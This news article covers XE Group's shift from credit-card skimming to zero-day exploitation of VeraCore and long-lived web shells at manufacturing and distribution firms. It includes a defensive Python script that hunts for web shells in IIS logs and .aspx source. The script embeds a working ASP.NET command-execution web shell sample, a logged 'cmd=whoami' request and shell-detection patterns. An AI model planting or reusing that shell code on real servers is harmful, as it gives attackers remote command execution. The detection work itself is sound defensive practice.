
Cybercrime Group Expands to Target Information from Supply Chain Organizations

A cybercrime group long associated with credit card theft has expanded its activities to target information from supply chain organizations in the manufacturing and distribution sectors.

Zero-Day Exploits in VeraCore

In a recent joint report, researchers from Intezer and Solis described the activity they observed as a sign of the heightened threat the group poses to organizations. "XE Group’s evolution from credit card skimming operations to exploiting zero-day vulnerabilities underscores their adaptability and growing sophistication," the researchers wrote. "By targeting supply chains in the manufacturing and distribution sectors, XE Group not only maximizes the impact of their operations but also demonstrates an acute understanding of systemic vulnerabilities."

XE Group: A Likely Vietnamese Threat Actor

XE Group is a likely Vietnamese threat actor that multiple vendors, including Malwarebytes, Volexity, and Menlo Security, have tracked for years. The group first surfaced in 2013 and was known primarily for exploiting Web application vulnerabilities to plant malware that skimmed credit card numbers and associated data from e-commerce sites. In June 2023, the US Cybersecurity and Infrastructure Security Agency (CISA) identified XE Group as one of several threat actors exploiting vulnerabilities in Progress Telerik software running on government IIS servers and executing remote commands on them.

XE Group’s Long-Term Cyberattack Objectives

In several recent attacks, the threat actor has used zero-day vulnerabilities to deploy multiple Web shells on compromised systems. "In at least one instance, Solis and Intezer researchers discovered the threat actor had exploited one of the VeraCore vulnerabilities as far back as January 2020 and had maintained persistent access to the victim’s compromised environment since then," according to the joint report. "In 2024, the group reactivated a webshell initially deployed in January 2020, highlighting their ability to remain undetected and reengage targets."
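A Web shell that sits dormant for four years and is then driven again is exactly what IIS access logs and a scan of the web root can surface. The following is an added example, not code from the Intezer/Solis report or from the affected vendor: it parses IIS W3C extended log lines, flags ASP.NET handlers that are being POSTed to in the way an operator drives a shell (a server-side script inside an upload directory, referer-less POSTs from a single client with a non-browser User-Agent, or command-style query parameters), and scores .aspx source for the usual shell building blocks. The log lines, file contents, paths, and indicator patterns are all constructed for illustration; tune them to the application you actually run.

```python
"""Hunt for ASP.NET Web shell activity in IIS W3C logs and in .aspx source.

Added example, not from the report discussed above. The log text and page
sources below are constructed; the column layout follows the standard IIS
W3C extended log format, whose "#Fields:" directive names the columns.
"""
import re
from collections import defaultdict

# Constructed IIS W3C log sample (six requests, two clients).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status
2024-03-04 09:12:01 10.0.0.5 GET /Default.aspx - 443 - 198.51.100.7 Mozilla/5.0 https://www.example.com/ 200
2024-03-04 09:12:05 10.0.0.5 POST /Login.aspx - 443 - 198.51.100.7 Mozilla/5.0 https://www.example.com/Default.aspx 302
2024-03-04 09:13:44 10.0.0.5 GET /Orders.aspx id=42 443 jdoe 198.51.100.7 Mozilla/5.0 https://www.example.com/Default.aspx 200
2024-03-04 11:02:17 10.0.0.5 POST /upload/img.aspx - 443 - 203.0.113.9 python-requests/2.31 - 200
2024-03-04 11:02:19 10.0.0.5 POST /upload/img.aspx cmd=whoami 443 - 203.0.113.9 python-requests/2.31 - 200
2024-03-04 11:05:00 10.0.0.5 POST /upload/img.aspx - 443 - 203.0.113.9 python-requests/2.31 - 200
"""

# Constructed page sources: a minimal command shell and a benign form handler.
SAMPLE_SHELL = '''<%@ Page Language="C#" %>
<% var p = new System.Diagnostics.Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.Arguments = "/c " + Request.Form["cmd"];
p.StartInfo.RedirectStandardOutput = true; p.StartInfo.UseShellExecute = false;
p.Start(); Response.Write(p.StandardOutput.ReadToEnd()); %>'''
SAMPLE_BENIGN = '''<%@ Page Language="C#" %>
<% Response.Write("Hello " + Server.HtmlEncode(Request.Form["name"])); %>'''

SCRIPT_EXTS = (".aspx", ".ashx", ".asmx", ".asax")
# Directories that should hold uploaded content, never executable server pages
# (assumed layout; adjust to the real application).
WRITABLE_DIRS = ("/upload/", "/uploads/", "/images/", "/temp/", "/files/")

SHELL_INDICATORS = {
    "process_start": re.compile(r"System\.Diagnostics\.Process|Process\.Start\(", re.I),
    "dynamic_load": re.compile(r"Assembly\.Load\(|\beval\s*\(", re.I),
    "request_input": re.compile(r"Request\.(Form|QueryString|Headers)\[", re.I),
    "file_write": re.compile(r"File\.WriteAll(Bytes|Text)\(|FileStream\(", re.I),
}


def parse_w3c(text):
    """Parse IIS W3C extended log text into dicts keyed by the #Fields names."""
    fields, entries = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) == len(fields):  # skip lines with embedded spaces we cannot map
            entries.append(dict(zip(fields, values)))
    return entries


def suspicious_script_posts(entries):
    """Map URIs of .NET handlers that look like driven Web shells to the reasons."""
    by_uri = defaultdict(list)
    for e in entries:
        uri = e["cs-uri-stem"].lower()
        if uri.endswith(SCRIPT_EXTS) and e["cs-method"].upper() == "POST":
            by_uri[uri].append(e)

    findings = {}
    for uri, posts in by_uri.items():
        reasons = []
        if any(uri.startswith(d) for d in WRITABLE_DIRS):
            reasons.append("server-side script inside writable directory")
        clients = {p["c-ip"] for p in posts}
        no_referer = [p for p in posts if p["cs(Referer)"] == "-"]
        tooling = [p for p in posts if not p["cs(User-Agent)"].startswith("Mozilla/")]
        if no_referer and tooling and len(clients) == 1:
            reasons.append("referer-less POSTs from one client with non-browser UA")
        if any(re.search(r"(^|&)(cmd|exec|command)=", p["cs-uri-query"]) for p in posts):
            reasons.append("command-style query parameter")
        if reasons:
            findings[uri] = reasons
    return findings


def scan_aspx_source(source):
    """Return the sorted indicator names present in an .aspx/.ashx source."""
    return sorted(name for name, rx in SHELL_INDICATORS.items() if rx.search(source))


def is_likely_shell(source):
    """Two or more indicators, one of them execution or dynamic loading."""
    hits = scan_aspx_source(source)
    return len(hits) >= 2 and bool({"process_start", "dynamic_load"} & set(hits))


if __name__ == "__main__":
    for uri, why in suspicious_script_posts(parse_w3c(SAMPLE_LOG)).items():
        print(uri, "->", "; ".join(why))
    print("shell indicators:", scan_aspx_source(SAMPLE_SHELL), is_likely_shell(SAMPLE_SHELL))
```

Run against real logs, the log heuristics are the starting point for a hunt rather than a verdict: a legitimate API client will also POST without a Referer, so the writable-directory and command-parameter signals carry most of the weight. The source scan is deliberately narrow; pair it with file-creation timestamps in the web root, since a shell dropped in 2020 and first requested again in 2024 shows up as an old file with a sudden burst of POSTs.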

XE Group’s Shift in Tactics and Targeting

The XE Group’s recent shift in tactics and targeting is consistent with a broader focus among threat actors on the software supply chain. Though SolarWinds remains perhaps the best-known example, there have been several other significant attacks on widely used software products and services. Examples include the mass exploitation of Progress Software’s MOVEit file transfer tool, a breach of Okta’s customer support system that affected all of that system’s users, and the compromise of Accellion’s file transfer appliance, which attackers used to steal data from some of the company’s customers and extort them.

Expanding Threats and Compromised Environments

The recent attacks show a group capable of holding access to a compromised environment for years and of deploying multiple Web shells across it. Its willingness to exploit a wide range of systems and software makes it a significant threat to organizations in the manufacturing and distribution sectors.

Early Focus on ASP.NET

The group’s current work on VeraCore, an ASP.NET application running on IIS, also fits an older pattern. In at least one earlier campaign, XE Group was observed exploiting vulnerabilities in ASP.NET sites at a time when such sites were rarely targeted by skimming crews. That willingness to work in less crowded corners of the Web stack is part of the adaptability and growing expertise in widely deployed products that researchers now see in its zero-day activity.

Supply Chain Risk

The recent XE Group attacks demonstrate the risk that a vulnerability in a single widely used software product poses to every organization downstream of it in the supply chain.

